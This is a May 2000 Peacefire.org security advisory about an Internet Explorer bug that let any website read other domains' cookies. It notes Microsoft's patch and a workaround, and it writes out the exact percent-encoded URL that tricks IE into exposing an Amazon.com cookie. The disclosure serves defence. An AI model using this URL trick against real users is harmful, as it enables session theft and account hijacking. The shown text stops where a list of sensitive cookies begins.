Peacefire.org
Youth against Internet censorship
"It's not a crime to be smarter than your parents."
Internet Explorer "Open Cookie Jar"
Cookies stored by IE for Windows can be read by any Web site

Bennett Haselton, bennett@peacefire.org
Jamie McCarthy, jamie@mccarthy.vg
5/11/2000

News sightings: Wall Street Journal | NYTimes (Note) | CNNfn | Slashdot | CNet | Internet News Radio | Newsbytes
MSNBC | ComputerWorld | National Post | WebDeveloper.com

See also:
JavaScript-in-cookies security hole (4/19/00) C-Net | ZDNet | NTSecurity | MSNBC
Eudora "stealth attachment" demo page (4/27/00) C-Net | ZDNet | Newsbytes | The Register
Internet Explorer "local JavaScript" security hole (5/5/00) C-Net | NewsBytes
"Fake mail form" security hole for Web-based email sites (5/9/00) C-Net | CNN.com
HotMail Attachment security hole (5/10/00) Wired | ZDNet | Slashdot | MSNBC | CNN.com

Any Web site that uses cookies to authenticate users or store private information -- including Amazon.com, HotMail, Yahoo Mail, DoubleClick, MP3.com, NYTimes.com, and thousands of others -- could have cookies exposed by Internet Explorer and intercepted by a third-party Web site.

Update 5/18/2000: Microsoft has released a patch that will fix this vulnerability in Internet Explorer:
http://www.microsoft.com/technet/security/bulletin/ms00-033.asp

If you have Internet Explorer for Windows, type a domain (e.g. "yahoo.com" or "hotmail.msn.com") in the space below, and click to view a page on Peacefire.org that will display your cookie for that domain:
(You must click the button to submit the domain name -- hitting Enter will not work)


Or you can go to a demonstration at the following URL, to see a list of information that is exposed by cookies set from Amazon.com, MP3.com, and other popular sites:
http://www.securityspace.com/exploit/exploit_1c.html (hosted by securityspace.com)

Pascal Gaudette reported that the same scheme will work for HTTPS cookies as long as the server referenced by the "malformed URL" is HTTPS-enabled. You can use this form to read HTTPS cookies (enter a domain name and press the button):
(You must click the button to submit the domain name -- hitting Enter will not work)

How it works
Using a specially constructed URL, a Web site can read Internet Explorer cookies set from any domain. For example, to read a user's Amazon.com cookie, a site could direct the user's browser to:
http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.amazon.com
If you replace the "%2f"'s with "/" characters, and the "%3F" with "?", this URL is actually:
http://www.peacefire.org/security/iecookies/showcookie.html?.amazon.com
But IE gets confused and thinks the page is located in the Amazon.com domain, so it allows the page to read the user's Amazon.com cookie.

Affected:
Internet Explorer (all known versions) for Windows 95, 98, NT, and 2000. IE for the Macintosh does not appear to be affected. Users have reported that IE versions for Solaris and HP/UX are vulnerable, but IE's browser share on UNIX platforms is much lower. No version of Netscape Navigator or any browser other than Internet Explorer appears to be vulnerable.

Workaround:
As of 5/18/2000, Microsoft has released a patch that fixes this problem:
http://www.microsoft.com/technet/security/bulletin/ms00-033.asp
If you do not want to download the patch, the safest workaround is to disable cookies. You can do this by going to
Tools->Internet Options->Security
and click the button to customize security settings, and set cookies to "disable". (Note that this will cause some sites such as HotMail to break.) Also, if you have Netscape's browser installed, it is not affected by the bug.

Implications

Jamie McCarthy came up with a list of cookies set by various sites that could be used to retrieve sensitive information: